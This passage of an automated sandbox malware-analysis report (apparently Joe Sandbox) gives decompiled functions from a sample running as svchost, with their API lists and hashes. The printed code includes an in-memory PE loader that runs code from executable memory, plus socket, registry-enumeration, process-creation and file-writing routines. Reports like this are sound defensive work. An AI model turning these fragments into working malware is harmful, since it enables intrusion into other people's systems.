                                                                                                                                        0x10003958
                                                                                                                                        0x10003963
                                                                                                                                        0x10003972
                                                                                                                                        0x1000397a
                                                                                                                                        0x00000000
                                                                                                                                        0x1000397c
                                                                                                                                        0x00000000
                                                                                                                                        0x1000397c
                                                                                                                                        0x1000396b
                                                                                                                                        0x00000000
                                                                                                                                        0x1000396b
                                                                                                                                        0x1000395a
                                                                                                                                        0x1000395a
                                                                                                                                        0x1000397e
                                                                                                                                        0x1000397e
                                                                                                                                        0x10003981
                                                                                                                                        0x10003983
                                                                                                                                        0x10003986
                                                                                                                                        0x10003987
                                                                                                                                        0x10003988
                                                                                                                                        0x10003990
                                                                                                                                        0x10003992
                                                                                                                                        0x10003992
                                                                                                                                        0x10003993
                                                                                                                                        0x10003998
                                                                                                                                        0x10003998
                                                                                                                                        0x10003990
                                                                                                                                        0x00000000
                                                                                                                                        0x10003936
                                                                                                                                        0x1000399e

                                                                                                                                        APIs
                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006), ref: 1000392C
                                                                                                                                        • connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 10003988
                                                                                                                                        • closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 10003993
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: closesocketconnectsocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 643388700-0
                                                                                                                                        • Opcode ID: 36a11a7321d524c3013cd1d88f6809580a537e2414aabcfffacbf84bcdf217f7
                                                                                                                                        • Instruction ID: 0fe64a1404b7cda7f6d95459f92f656de840ddd7733fe327a0aa6c96d15c6893
                                                                                                                                        • Opcode Fuzzy Hash: 36a11a7321d524c3013cd1d88f6809580a537e2414aabcfffacbf84bcdf217f7
                                                                                                                                        • Instruction Fuzzy Hash: 56015630904309AAFB11DFA48C86B9F739CEB003F4F10DA1AF575951D9D7F499449711
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.09%

                                                                                                                                        Function 1000A89E, Relevance: 4.5, APIs: 3, Instructions: 48registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E1000A89E(void* __ecx, intOrPtr _a4, void* _a8, char* _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				long _t22;
				long _t23;
				void* _t34;

				_t34 = __ecx;
				_t22 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t23 = _t22;
				if(_t23 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E10001E05(E10001DB1(_a12, "\\"),  &_v2064);
						E1000A709(_t34, _a4, _a8, _v2068, _a16);
						E10001871(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t23;
			}











                                                                                                                                        0x1000a89e
                                                                                                                                        0x1000a8b1
                                                                                                                                        0x1000a8b6
                                                                                                                                        0x1000a8b8
                                                                                                                                        0x1000a8be
                                                                                                                                        0x1000a8c5
                                                                                                                                        0x1000a8c5
                                                                                                                                        0x1000a8ec
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000a90c
                                                                                                                                        0x1000a921
                                                                                                                                        0x1000a92c
                                                                                                                                        0x1000a931
                                                                                                                                        0x1000a931
                                                                                                                                        0x00000000
                                                                                                                                        0x1000a939
                                                                                                                                        0x1000a93f

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 1000A8B1
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 1000A8E5
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 1000A939
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEnumOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1332880857-0
                                                                                                                                        • Opcode ID: 0f85eeccc54245a9827ff4c3cc96af946dd8fa5877d7234fea3b38c3c0280e68
                                                                                                                                        • Instruction ID: f47b53803592f8f4f6a176bf7fb9741ab81eb69629b35a8a2d74928b383861f2
                                                                                                                                        • Opcode Fuzzy Hash: 0f85eeccc54245a9827ff4c3cc96af946dd8fa5877d7234fea3b38c3c0280e68
                                                                                                                                        • Instruction Fuzzy Hash: A2110C7690010DBAEF11DF90CC42FDD7BB9FF04380F1081A1B514641AAEB75AB91AF91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.03%

                                                                                                                                        Function 02443940, Relevance: 4.5, APIs: 3, Instructions: 38processCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E02443940(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				int _t11;

				_v88.cb = 0x44;
				E024414A0( &(_v88.lpReserved), 0, 0x40);
				_t11 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20); // executed
				if(_t11 != 0) {
					CloseHandle(_v20);
					CloseHandle(_v20.hThread);
					return 1;
				}
				return 0;
			}






                                                                                                                                        0x02443946
                                                                                                                                        0x02443955
                                                                                                                                        0x02443977
                                                                                                                                        0x0244397f
                                                                                                                                        0x02443989
                                                                                                                                        0x02443993
                                                                                                                                        0x00000000
                                                                                                                                        0x02443999
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle$CreateProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2922976086-0
                                                                                                                                        • Opcode ID: 3849761fdbcb4bf66fe5e70596c4861ec4a88348931424e499f1cceec48b8882
                                                                                                                                        • Instruction ID: fefe16fa39135a7368fb2fcd0c7569ec2f6580f3a66a805b1f50ebd81d3eb624
                                                                                                                                        • Opcode Fuzzy Hash: 3849761fdbcb4bf66fe5e70596c4861ec4a88348931424e499f1cceec48b8882
                                                                                                                                        • Instruction Fuzzy Hash: B9F0F4B6E40208ABE714DFE0DC45FBF7778AB44704F004959FA099B284DB75A558CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.62%

                                                                                                                                        Function 02443C10, Relevance: 4.5, APIs: 3, Instructions: 38fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E02443C10(void* __ecx, CHAR* _a4, void* _a8, long _a12) {
				void* _v8;
				void* _t13;

				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t13 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0); // executed
					_v8 = _t13;
					if(_v8 == 0xffffffff) {
						goto L4;
					}
					WriteFile(_v8, _a8, _a12,  &_a12, 0); // executed
					CloseHandle(_v8);
					return 1;
				}
			}





                                                                                                                                        0x02443c18
                                                                                                                                        0x02443c6e
                                                                                                                                        0x00000000
                                                                                                                                        0x02443c20
                                                                                                                                        0x02443c36
                                                                                                                                        0x02443c3c
                                                                                                                                        0x02443c43
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x02443c57
                                                                                                                                        0x02443c61
                                                                                                                                        0x00000000
                                                                                                                                        0x02443c67

                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(02442789,40000000,00000000,00000000,00000002,00000080,00000000,02442789), ref: 02443C36
                                                                                                                                        • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 02443C57
                                                                                                                                        • CloseHandle.KERNEL32(000000FF), ref: 02443C61
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1065093856-0
                                                                                                                                        • Opcode ID: 2bd8832b86edef919e5385fef945bba75025f5cb3711ef797673e653389f34a6
                                                                                                                                        • Instruction ID: 9cd638e92936c4939fa95dbc1038a13933e94c824fe8c951f8f315dd0803b9f6
                                                                                                                                        • Opcode Fuzzy Hash: 2bd8832b86edef919e5385fef945bba75025f5cb3711ef797673e653389f34a6
                                                                                                                                        • Instruction Fuzzy Hash: 09F04475640308FBE714CFA8CD49F9E77B8AB08B14F208649BA14962C0DB70AA90CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.04%

                                                                                                                                        Function 10003F8F, Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                        			E10003F8F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v12;
				void* __ebx;
				void* _t18;
				void* _t19;
				void* _t20;

				_t19 = 0;
				if(_a8 != 0 && _a12 != 0) {
					_t14 =  &_v8;
					_push(_t14);
					_push(_a8);
					L1000BA64();
					if(_t14 >= 0) {
						_v12 = E10001091(_t14, 0, _t20, _a8);
						_t14 = GlobalLock(_v8);
						if(GlobalLock(_v8) != 0) {
							_t18 = E10003F35(_t20, _a4, _t14, _v12, _a12); // executed
							_t19 = _t18;
							_t14 = GlobalUnlock(_v8);
						}
					}
					E100012C2(_t14, _t20, _a8);
				}
				return _t19;
			}









                                                                                                                                        0x10003f96
                                                                                                                                        0x10003f9c
                                                                                                                                        0x10003fa4
                                                                                                                                        0x10003fa7
                                                                                                                                        0x10003fa8
                                                                                                                                        0x10003fab
                                                                                                                                        0x10003fb2
                                                                                                                                        0x10003fbc
                                                                                                                                        0x10003fc7
                                                                                                                                        0x10003fc9
                                                                                                                                        0x10003fd5
                                                                                                                                        0x10003fda
                                                                                                                                        0x10003fdf
                                                                                                                                        0x10003fdf
                                                                                                                                        0x10003fc9
                                                                                                                                        0x10003fe7
                                                                                                                                        0x10003fe7
                                                                                                                                        0x10003ff0

                                                                                                                                        APIs
                                                                                                                                        • GetHGlobalFromStream.OLE32(00000000,?), ref: 10003FAB
                                                                                                                                        • GlobalLock.KERNEL32 ref: 10003FC2
                                                                                                                                        • GlobalUnlock.KERNEL32(?,?,00000000,00000000,?), ref: 10003FDF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$FromLockStreamUnlock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2287449323-0
                                                                                                                                        • Opcode ID: 80c2ff928e601c4828d72f96b8c946af4fda8ed620e808753be0437ec2a1e452
                                                                                                                                        • Instruction ID: 5d5a65e50073825c305d2d03fb178da110e8bd86d415743e381340723fdabe95
                                                                                                                                        • Opcode Fuzzy Hash: 80c2ff928e601c4828d72f96b8c946af4fda8ed620e808753be0437ec2a1e452
                                                                                                                                        • Instruction Fuzzy Hash: 29F0FF35900209BBEF02DFA0CC41EAE7BB9EF00294F108135B91495076DB72DF60DA50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.64%

                                                                                                                                        Function 024433F0, Relevance: 3.8, APIs: 3, Instructions: 83memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                        			E024433F0(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				long _v20;
				void* _v24;
				void* _v28;
				void* _t46;
				void* _t48;
				void* _t72;

				_v16 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
				_v12 =  *((intOrPtr*)(_v16 + 0x34));
				_v20 =  *((intOrPtr*)(_v16 + 0x50));
				_v8 = 0;
				_v24 = 0;
				while(1) {
					_t46 = VirtualAlloc(_v12, _v20, 0x3000, 0x40); // executed
					_v8 = _t46;
					if(_v8 == 0) {
						_v8 = VirtualAlloc(0, _v20, 0x3000, 0x40);
						_v12 = _v8;
					}
					if(_v8 == 0) {
						break;
					}
					_v28 = 0;
					_t48 = E02443B40(_a4, _a8, _v8, _v12);
					_t72 = _t72 + 0x10;
					_v28 = _t48;
					if(_v28 != 1) {
						L13:
						if(_v8 != 0 && _v24 == 0) {
							VirtualFree(_v8, _v20, 0x8000);
						}
						return _v24;
					}
					if(_a12 != 0) {
						 *_a12 = _v12;
					}
					if(_a16 != 0) {
						 *_a16 = _v12 +  *((intOrPtr*)(_v16 + 0x28));
					}
					_v24 = 1;
					if(0 != 0) {
						continue;
					} else {
						goto L13;
					}
				}
				goto L13;
			}












                                                                                                                                        0x024433ff
                                                                                                                                        0x02443408
                                                                                                                                        0x02443411
                                                                                                                                        0x02443414
                                                                                                                                        0x0244341b
                                                                                                                                        0x02443422
                                                                                                                                        0x02443431
                                                                                                                                        0x02443437
                                                                                                                                        0x0244343e
                                                                                                                                        0x02443453
                                                                                                                                        0x02443459
                                                                                                                                        0x02443459
                                                                                                                                        0x02443460
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x02443464
                                                                                                                                        0x0244347b
                                                                                                                                        0x02443480
                                                                                                                                        0x02443483
                                                                                                                                        0x0244348a
                                                                                                                                        0x024434c1
                                                                                                                                        0x024434c5
                                                                                                                                        0x024434da
                                                                                                                                        0x024434da
                                                                                                                                        0x00000000
                                                                                                                                        0x024434e0
                                                                                                                                        0x02443490
                                                                                                                                        0x02443498
                                                                                                                                        0x02443498
                                                                                                                                        0x0244349e
                                                                                                                                        0x024434ac
                                                                                                                                        0x024434ac
                                                                                                                                        0x024434b2
                                                                                                                                        0x024434bb
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x024434bb
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNEL32(00000001,00000000,00003000,00000040), ref: 02443431
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0244344D
                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024434DA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$Alloc$Free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3668210933-0
                                                                                                                                        • Opcode ID: feee90ea45a8a4d1dc21892c39a50fe3f34ac5236b97474124b8aafbe1b0fa71
                                                                                                                                        • Instruction ID: 686d17ee499e5147e1e51d7669c9f6be59e96d8f9646b670519eab94c5eb4113
                                                                                                                                        • Opcode Fuzzy Hash: feee90ea45a8a4d1dc21892c39a50fe3f34ac5236b97474124b8aafbe1b0fa71
                                                                                                                                        • Instruction Fuzzy Hash: EF311774D00209EFEB15CF94C545BEEBBB4FB48704F60858AEA05A7380C774AA81CF91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.41%

                                                                                                                                        Function 10001E6A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                        			E10001E6A(void* __eflags, signed int _a4) {
				intOrPtr _v8;
				void* _t12;
				intOrPtr _t19;
				intOrPtr* _t21;

				_v8 = E10001888(0x105);
				if( *0x1000f536 != 0) {
					_t12 =  *0x1000f536(0, _a4, 0, 0, _v8); // executed
					if(_t12 < 0) {
						goto L3;
					}
				} else {
					L3:
					E10001871(_v8);
					_v8 = 0;
					_t21 = 0x1000f53a;
					while( *_t21 != 0) {
						_t20 =  *_t21;
						if( *((intOrPtr*)( *_t21 + 4)) != (_a4 & 0xffff7fff)) {
							L7:
							_t21 = _t21 + 4;
							continue;
						} else {
							_t19 = E10001D2A( *_t20, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", _t20 + 8, 0);
							if(_t19 == 0) {
								goto L7;
							} else {
								_v8 = _t19;
							}
						}
						goto L9;
					}
				}
				L9:
				return _v8;
			}







                                                                                                                                        0x10001e7b
                                                                                                                                        0x10001e85
                                                                                                                                        0x10001e95
                                                                                                                                        0x10001e9d
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10001e87
                                                                                                                                        0x10001e9f
                                                                                                                                        0x10001ea2
                                                                                                                                        0x10001ea7
                                                                                                                                        0x10001eae
                                                                                                                                        0x10001ee2
                                                                                                                                        0x10001eb5
                                                                                                                                        0x10001ec2
                                                                                                                                        0x10001edf
                                                                                                                                        0x10001edf
                                                                                                                                        0x00000000
                                                                                                                                        0x10001ec4
                                                                                                                                        0x10001ed6
                                                                                                                                        0x10001ed8
                                                                                                                                        0x00000000
                                                                                                                                        0x10001eda
                                                                                                                                        0x10001eda
                                                                                                                                        0x10001eda
                                                                                                                                        0x10001ed8
                                                                                                                                        0x00000000
                                                                                                                                        0x10001ec2
                                                                                                                                        0x10001ee2
                                                                                                                                        0x10001ee7
                                                                                                                                        0x10001eec

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 10001E95
                                                                                                                                        Strings
                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 10001ECA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocFolderLocalPath
                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                        • API String ID: 1254228173-2036018995
                                                                                                                                        • Opcode ID: 3366412ca225dd87371a9b2d3f366c3ecca2e8fba8b001ed5588c2d515f4ed2f
                                                                                                                                        • Instruction ID: 5b3514682ffdf82955c538daec004618cab2bab663efea2d3b3cf74ace447c0f
                                                                                                                                        • Opcode Fuzzy Hash: 3366412ca225dd87371a9b2d3f366c3ecca2e8fba8b001ed5588c2d515f4ed2f
                                                                                                                                        • Instruction Fuzzy Hash: B0018435900289FBFB10CF54DC05BDDB7E5EB403D0F214229EA119A198DB719F41EB90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        Function 02441EA0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E02441EA0() {
				void* _t1;
				void* _t2;

				if( *0x24473f0 == 0) {
					_t2 = InternetOpenA("Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko", 0, 0, 0, 0); // executed
					 *0x24473f0 = _t2;
				}
				_t1 =  *0x24473f0; // 0xcc0004
				return _t1;
			}





                                                                                                                                        0x02441eaa
                                                                                                                                        0x02441eb9
                                                                                                                                        0x02441ebf
                                                                                                                                        0x02441ebf
                                                                                                                                        0x02441ec4
                                                                                                                                        0x02441eca

                                                                                                                                        APIs
                                                                                                                                        • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 02441EB9
                                                                                                                                        Strings
                                                                                                                                        • Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko, xrefs: 02441EB4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InternetOpen
                                                                                                                                        • String ID: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                        • API String ID: 2038078732-3333256863
                                                                                                                                        • Opcode ID: 550043fa8a768d4c3ac6cfaf79ee279d4492b42e2e9365d4aabddbf0c18f0883
                                                                                                                                        • Instruction ID: daa2a0b55599b9d45810afcb1760f776a37504ced492b86375e1a928ab78e977
                                                                                                                                        • Opcode Fuzzy Hash: 550043fa8a768d4c3ac6cfaf79ee279d4492b42e2e9365d4aabddbf0c18f0883
                                                                                                                                        • Instruction Fuzzy Hash: 74D0C938EC0309ABF3248F48AC06F5177D4E304B49F200812FB09652C0D7E07471CA88
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 6.84%

                                                                                                                                        Function 10003D1A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                        			E10003D1A(intOrPtr _a4) {
				short _v6;
				char _v8;
				char* _t5;

				_v8 = 1;
				_v6 = 0x2d;
				_push(4);
				_t5 =  &_v8;
				_push(_t5);
				_push(0x80);
				_push(0xffff);
				_push(_a4);
				L1000B902(); // executed
				return _t5;
			}






                                                                                                                                        0x10003d20
                                                                                                                                        0x10003d26
                                                                                                                                        0x10003d2c
                                                                                                                                        0x10003d2e
                                                                                                                                        0x10003d31
                                                                                                                                        0x10003d32
                                                                                                                                        0x10003d37
                                                                                                                                        0x10003d3c
                                                                                                                                        0x10003d3f
                                                                                                                                        0x10003d45

                                                                                                                                        APIs
                                                                                                                                        • setsockopt.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 10003D3F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: setsockopt
                                                                                                                                        • String ID: -
                                                                                                                                        • API String ID: 3981526788-2547889144
                                                                                                                                        • Opcode ID: c00deffa8279f414deeb298b0719be20528acea0531aeb82b9b4c04b10122719
                                                                                                                                        • Instruction ID: 0d75a650b1316d621f053bafd32783ef1c68aeefaa6748fc0268d4c78e028514
                                                                                                                                        • Opcode Fuzzy Hash: c00deffa8279f414deeb298b0719be20528acea0531aeb82b9b4c04b10122719
                                                                                                                                        • Instruction Fuzzy Hash: B4D0C76055020DB5D710DB44CC07F9D72789F01758F108271BB50AA2E1E7F56B58939D
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.92%

                                                                                                                                        Function 024439B0, Relevance: 3.1, APIs: 2, Instructions: 63threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                        			E024439B0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				char _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				struct _SECURITY_ATTRIBUTES* _t25;

				if(E02442D80(__ecx, _a4) != 0) {
					_v12 = 0;
					_t25 = E024433F0(_a4, _a8,  &_v8,  &_v16); // executed
					_v12 = _t25;
					if(_v12 != 1) {
						return 0;
					}
					E02443800(_v8); // executed
					if(_a12 != 1) {
						if(_a16 != 1) {
							_v28 = _v16;
							_v28();
						} else {
							_v24 = _v16;
							_v24(_v8, 1, 0);
						}
					} else {
						_v20 = CreateThread(0, 0, E02443B00, _v8, 0, 0);
						CloseHandle(_v20);
					}
					return 1;
				}
				return 0;
			}










                                                                                                                                        0x024439c4
                                                                                                                                        0x024439cd
                                                                                                                                        0x024439e4
                                                                                                                                        0x024439ec
                                                                                                                                        0x024439f3
                                                                                                                                        0x00000000
                                                                                                                                        0x02443a56
                                                                                                                                        0x024439f9
                                                                                                                                        0x02443a05
                                                                                                                                        0x02443a31
                                                                                                                                        0x02443a49
                                                                                                                                        0x02443a4c
                                                                                                                                        0x02443a33
                                                                                                                                        0x02443a36
                                                                                                                                        0x02443a41
                                                                                                                                        0x02443a41
                                                                                                                                        0x02443a07
                                                                                                                                        0x02443a1e
                                                                                                                                        0x02443a25
                                                                                                                                        0x02443a25
                                                                                                                                        0x00000000
                                                                                                                                        0x02443a4f
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • CreateThread.KERNEL32 ref: 02443A18
                                                                                                                                        • CloseHandle.KERNEL32(00000001,?,?,?,?,?,?,?,024419B9), ref: 02443A25
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateHandleThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3032276028-0
                                                                                                                                        • Opcode ID: f628649530502677825ae195bfca3bd8e8250cabc5ff1c43e60a6264aa3cc52c
                                                                                                                                        • Instruction ID: d97087717fa851af0eaea248ff52e60ca5f72253099e13b8d737d315811135c3
                                                                                                                                        • Opcode Fuzzy Hash: f628649530502677825ae195bfca3bd8e8250cabc5ff1c43e60a6264aa3cc52c
                                                                                                                                        • Instruction Fuzzy Hash: 9B1145B5E40208FFEB14DF94C945BAE7B78AB04B04F20449AE915B6240DB71AA50CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.08%

                                                                                                                                        Function 02443100, Relevance: 3.0, APIs: 2, Instructions: 49stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                        			E02443100(CHAR* _a4) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				char _v276;
				char _v4372;
				signed int _t23;
				void* _t26;
				int _t29;
				void* _t40;
				void* _t41;

				E02441420(0x1110);
				_t23 =  &_v16;
				_push(_t23);
				_push(0x1000);
				_push( &_v4372); // executed
				L02443D34(); // executed
				if(_t23 != 0) {
					_v12 = _v16 >> 2;
					_v8 = 0;
					while(_v8 < _v12) {
						_t26 = E024431A0( *((intOrPtr*)(_t40 + _v8 * 4 - 0x1110)),  &_v276); // executed
						_t41 = _t41 + 8;
						if(_t26 == 0) {
							L8:
							_t23 = _v8 + 1;
							_v8 = _t23;
							continue;
						}
						_t29 = lstrcmpiA( &_v276, _a4); // executed
						if(_t29 != 0) {
							goto L8;
						}
						return  *((intOrPtr*)(_t40 + _v8 * 4 - 0x1110));
					}
					return _t23 | 0xffffffff;
				}
				return _t23 | 0xffffffff;
			}













                                                                                                                                        0x02443108
                                                                                                                                        0x0244310d
                                                                                                                                        0x02443110
                                                                                                                                        0x02443111
                                                                                                                                        0x0244311c
                                                                                                                                        0x0244311d
                                                                                                                                        0x02443124
                                                                                                                                        0x02443131
                                                                                                                                        0x02443134
                                                                                                                                        0x02443146
                                                                                                                                        0x02443160
                                                                                                                                        0x02443165
                                                                                                                                        0x0244316a
                                                                                                                                        0x0244318d
                                                                                                                                        0x02443140
                                                                                                                                        0x02443143
                                                                                                                                        0x00000000
                                                                                                                                        0x02443143
                                                                                                                                        0x02443177
                                                                                                                                        0x0244317f
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x02443184
                                                                                                                                        0x00000000
                                                                                                                                        0x0244318f
                                                                                                                                        0x00000000

                                                                                                                                        APIs
